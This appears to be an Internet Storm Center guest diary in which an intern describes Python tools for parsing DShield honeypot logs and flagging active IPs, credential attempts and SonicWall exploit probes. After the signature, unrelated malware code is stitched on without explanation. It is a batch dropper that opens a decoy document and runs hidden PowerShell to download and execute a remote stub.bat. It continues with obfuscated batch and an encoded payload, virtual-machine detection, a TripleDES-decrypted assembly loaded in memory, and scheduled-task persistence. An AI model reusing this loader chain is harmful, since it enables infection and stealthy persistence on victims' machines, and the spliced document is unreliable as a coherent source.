[This is a Guest Diary by William Constantino, an ISC intern as part of the SANS.edu BACS program]

In the beginning of my Internet Storm Center (ISC) internship, I wasted too much time trying to build my SIEM from an old computer I had lying around, or a new Raspberry Pi I purchased. I keep running into roadblocks and errors. Also, I was distracted while trying to finish up another course, and I had every intention of looking at my log files every day, but it wasn’t happening. I did the easy thing of saying “I’ll look at it tomorrow. The JSON logs and Sqlite3 were the other problems with reading the logs without a SIEM, it produced massive amounts of data to parse through. To me it was like trying to find a needle in a haystack. To resolve this problem, I built two automated python tools to assist with those tasks and analyze the data. 

The first tool helped me process and organize the data I was looking at and helped point me in the right direction of interesting things to investigate further. This tool gave me the following capabilities:

1. It loads, reads, and parses JSON files by extracting the source IP addresses, request methods, accessed URLs, timestamps, user agents, response codes, credentials, and hashes.
2. Tracks IP activity by recording the different request methods used (GET, POST, etc.), and it stores the timestamps of requests for timeline analysis.
3. Counts URL accesses for identifying the most frequently visited endpoints, logs the user agent strings to detect patterns in client access, and captures the response codes to track server errors or unusual behavior.
4. Detects suspicious activity by flagging suspicious file requests (.php, .exe, .zip, etc.), extracts credential attempts (20 of the most used usernames and passwords), and identifies hashed values (MD5, SHA1, CRC32, NTLM, etc.)
5. Generates a generic security report by reporting the top 10 most active IPs, bottom 10 least active IPs, and the total amount of Unique IPs. It gives a summary of total requests, detected hashes, and credential attempts.
6. Lastly it measures how long the script takes to process the log file. It displays the results in minutes and seconds (I added this last because I just wanted to know how long it was taking to read and parse through the data).
7. The sample output from this tool is from 2025-05-31, and it was a massive log file at over 3.5GB for one day (why I added the timer). I will break down the output in sections for Tool 1 below:

Figure 1: Top 10 most Active IP addresses, Bottom 10 Least Active IPs, and General Summary.

Continued Output Tool 1:

Figure 2: The Request Methods Used and Top Accessed URLs.

Continued Output Tool 1: 

Figure 3: Suspicious File Requests and Top User-Agent Strings.

Continued Output Tool 1: 

Figure 4: Top attempted usernames and attempted passwords.

Continued Output Tool 1:
 

Figure 5: Hashes Detected and the Time it took to read the log file.

Once I had this output to look at, I determine what IP address that is the most interesting. However, I usually start with the one with the largest number of requests to see what is going on. I will look at all 10-20 (Top and Bottom 10) individually and see what they were doing and then determine which IP address to highlight for my analysis. Sometimes, if I’m looking at the same exploit, I’ll research all the other IPs to see if there is a novel attack or a different type of attack. To assist with a further investigation, I developed a second tool to help me with this. It is basically, the same as the first tool, but it focuses on further detailed analysis of specific IP(s).

The second python tool performs a detailed analysis on a specific IP address or addresses that you want further analysis on from a given a JSON log file. This tool does the following things:

1. Provides a prompt to input one (1) or multiple IP addresses.
2. It extracts the “sip” (source IP) field from each log entry and identifies requests.
3. The script gathers the HTTP request methods used by the target IP (GET, POST, HEAD, etc.). It also records the timestamps of the request timeframe.
4. Analyzes the User-Agent Strings which can provide insight into whether the requests originated from a legitimate browser, automated bot, or a hacking tool.
5. Examines response codes to show whether the target IP successfully accessed certain resources.
6. Detects suspicious file requests (.php, .exe, .zip, .bat, .sh, .py)
7. Credential attempts using default usernames and passwords (currently only the top twenty of each). 

Below is my output for the second tool (also for 2025-05-31). It is basically, the same as the first tool, but it focuses on further detailed analysis of specific IPs.

Output Tool 2:

Figure 6: Prompt to enter one (1) IP or multiple IP addresses separated by a comma.

Continued output Tool 2:

Figure 7: I inputted IP address (141.98.80.134). In this case, it was the #1 active IP.

Continued output of Tool 2:

Figure 8: Analysis for IP (141.98.80.134) with a massive number of requests.
 
According to the top accessed URLs in this investigation of this IP are known for CVE-2021-20016. I’ve actually seen this type of attack lately. 

Figure 9: Internet Storm Center Report for an exploit for Sonicwall [1].

Continued output of Tool 2:

Figure 10: User-Agent Strings and Attempted Passwords. 

This script will notify if it did not find any data for the specific fields looked at. The first tool does not do this, but usually there are all types of data and no field is empty during the investigation.

Continued output of Tool 2:

Figure 11: The Log Analysis is Complete. 

It took almost 13 minutes to complete. This was a massive file compared to other days, so analysis will be much faster with less data.
Using this tool to analyze the data in a short amount of time, the analyst will be able to inquire more information about the IP from websites like Virustotal, IPQualityScore, APIVoid, and etc. That information might give additional data points to see if further investigation is warranted or not.

In Conclusion, my script(s) or python tool(s) can assist help detect potential attackers that are targeting their DShield Honeypot. The tools can assist in forensic analysis by tracking IP behavior, login attempts, suspicious files, and other types of data. Additionally, they can provide insights into common attack patterns and methods that could be used by malicious actors. Moreover, other students or individuals can benefit from using these tools for their analysis and attack observations. This is only the starting point for these tools, massive improvements can be made to make them even more effective and useful. In the short term, though, these tools significantly assisted in my analysis projects during this internship. I have attached the links to my GitHub for both tools below.

[1] https://isc.sans.edu/diary/31906
[2] https://github.com/JJWCons/log-scripts/blob/main/logfile_investigation.py (Tool 1 Code)
[3] https://github.com/JJWCons/log-scripts/blob/main/single_multi_IP.py (Tool 2 Code)
[4] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

@echo off
set "DOCX_PATH=%dp0Game_Purchase_Agreement (1).docx"
set "BAT_URL=hxxps://store3[.]gofile[.]io/download/web/60e1cbe3-5bcb-4ce5-9807-096b7ef2152c/stub.bat"
set "STUB_BAT=%dp0stub.bat"
start "" "%DOCX_PATH%"
powershell -noprofile -windowstyle hidden -command "Invoke-WebRequest -Uri '%BAT_URL%' -OutFile '%STUB_BAT%'"
start "" /B "%STUB_BAT%"

%ywbR5EU0%got%psT9UHn%o%ck4mP% :cFjGe

:: merit cause glow side across trick humble man aunt man
:KVwlg
%wn70F%s%xrXwJ%et%zLQjCV% "BFT0e7D9=;$OM1Hj" && %NV38nVKJ%set%tlIujlLR% "wGIv=ey = "&&%mAyrqy%set "wxzXFAyU=Fu.GetT"
%MqHr7m%s%dOBZ%e%ARwzE%t%SN8O3x1% "BjosEB=.Tripl"
s%CVz5%e%PLqV%t "Ie9m=ray();$"
%y5ysfL1C%se%UnikunR6%t%k44zaPJk% "C209=ilter P" &&%psM62h7K%s%lTgUuB%e%oGydvBuB%t%hOBl% "sRJXLMHX=r');$"&& %KNhC9wR%se%DID28qi%t%AgqDi% "DYcN9B=e[]]@(" && s%ENstJM%e%IRLW%t%A6NRgyd% "k3mI=s8 $OM1" &&%mG1f%se%DWxnLG%t%Oaiu% "YZrsX=rovide" && set "NmTYyNq2=Invo"
g%yQH7u6H%oto :bPY4

:: reject purity renew better trick
:iaryMFz
s%dEnHV9%e%KlnkeRpX%t%CTZS% "INBx=9dihP4hL+W2iB2H0u+lsbZDuvimWfacpQlS1QtvFkz3HJHmQ/+fRyQmOGIySz8noyZRUvv8N2AANhsHyXPLu7v9C0UUWeVPeCrfxZ6fgO1tiA+snvgjBybIc4dLxLLLuKGBUFC/5s2769pZpG1f3Z5ESc78Mgu6r7vlTDR1jw1Ij7J3v1qbePCzXtVOTTZi4W27TCpmLlOdDxgTOX3S+28cdUjQd5Q/PwGHesVj8KmCF8fBs1gGjLBUuINaJZuw2mIMWUjGYIbi7offuFiGATIbI9W2g1ngygxsUdOgxAdA3abf0P9L/M/uLCqWCpIl5U+Obj4u8E2ZvM8eICTZqsALHLz5DFGUl7U/L4cGZRbVWQBwv63bKltQv3q3ma296OsEzTltU5e3TEmGgzq3qPtahJQtYmWr4KTs8CUVdjNUDmfgkSO/NsnDtcE1KhO4ufE0sqnQbJ/WqXgvPEgyWB5/KBV3Rm8IS3/9vflXACiW3Po5tpXRLrToKzHQd8O7glrGljxmKMjuROsHCIrrAPbU5HgyH7vakWyhkqYRwCTw1xic91VIlSwjhFBC0PK6OViBiExWp8xa3KmLda2Gc/mprS3n8xo7xBgQplNRyd24yTNMPjcJExj3te3mXma5UUHMBgCL8BtwS4y9J6nRJ+pN2t1U/MCPWhqkuODuc/ND8SuJ8b2g2BVvLv+30nNEmNgvIaM5CHM05G3P9uoB4XZl1sOVKREa/AqbpdjUBkqFhOJcRVqw/3fdG+pai+MGXYpcpQF0HjNkB69FHPksUn91MneNXnPPx1+VfJ6tCJtrRlrA47yXXInkIdCK4JEsuSKLU8n6Lky1FJ7R7GYRrCqaka0uINE5/0DYjD1MNQLswQmap1B1HhSm+X3m7eh2ZLGFOYwX3oKunKeCXk1tFRVbXoKSHkZgxt5nmlNwxQRVXIyzv1Feu85gIWkiMxihIczvfCrFRMJPDW80JSZWpKs1y/iZlja9AWqoE7pjs6buf7hEhN8d/UJmQcVB20AuvQh+RqGRUD3y4YzFEdTSPMSsC9DaQoZZkL/PVFn8q

powershell.exe -ep bypass -w hidden -command $bKOPdCKMepGCO5Y9Yf=(Get-Disk).FriendlyName;if ($bKOPdCKMepGCO5Y9Yf -like '*DADY'+' HARD'+'DIS'+'K*' -or $bKOPdCKMepGCO5Y9Yf -like '*QEMU '+'HARDDI'+'SK*') {taskkill /f /im cmd.exe}

PS C:\Users\REM>(Get-Disk).FriendlyName
QEMU HARDDISK

powershell.exe -ep bypass -w hidden -command $cVql = [System.Convert]::FromBase64String(($env:vFSz6.Split('.')|ForEach-Object{(Get-Item ('Env:'+$_)).Value})-join'');$yqt3Czji = [Type]::GetType('System.Security.Cryptography.TripleDESCryptoServiceProvider')::new();$yqt3Czji.Key = [byte[]]@(30,81,30,197,159,52,214,36,169,151,167,116,102,113,244,65);$yqt3Czji.Mode = 'ECB';$yqt3Czji.Padding = 'PKCS7';$yRCM = $yqt3Czji.CreateDecryptor().TransformFinalBlock($cVql,0,$cVql.Length);$XfQ7 = New-Object ('System'+'.IO'+'.Me'+'morySt'+'ream') -ArgumentList (,$yRCM);$nlt6O = New-Object ('Syste'+'m.IO'+'.Me'+'morySt'+'rea'+'m');$tej8sBLE = New-Object ('Syst'+'em.IO.'+'Compre'+'ssio'+'n.G'+'ZipSt'+'rea'+'m') -ArgumentList ($XfQ7, [IO.Compression.CompressionMode]('Decompress'));$tej8sBLE.CopyTo($nlt6O);$UWoQx = $nlt6O.ToArray();$uGjPve = New-Object ('Sys'+'tem'+'.Secu'+'rity'+'.Cry'+'ptogra'+'phy.'+'SHA256'+'Crypt'+'oSer'+'viceP'+'rovid'+'er');$s86s8 = $uGjPve.ComputeHash($UWoQx);$OM1Hjgf = [byte[]]@(26,203,98,66,123,85,187,210,99,96,236,147,173,234,222,190,107,34,223,203,242,234,205,211,250,22,173,56,84,163,184,31);if (-Not (Compare-Object $s86s8 $OM1Hjgf)) {$dfGJB = (Get-CimInstance ('Win32_'+'Pro'+'cess') -Filter ProcessId=$pid).CommandLine;foreach ($EsLaimFu in [AppDomain]::CurrentDomain.GetAssemblies()){if ($EsLaimFu.GlobalAssemblyCache -And $EsLaimFu.Location.Contains('mscorl'+'ib.dll')){foreach ($pMdg2Ay in $EsLaimFu.GetType('Syste'+'m.Refl'+'ect'+'ion.As'+'sembly').GetMethods('Pub'+'lic,St'+'atic')){if ($pMdg2Ay.ToString()[38] -eq ')') {$pMdg2Ay.Invoke($null, (,$UWoQx)).EntryPoint.Invoke($null, (,[string[]](,$dfGJB)))}}}}}

schtasks /create /xml 4TCqY.xml /tn f4a22537-7897-4a26-90de-51508f11b41d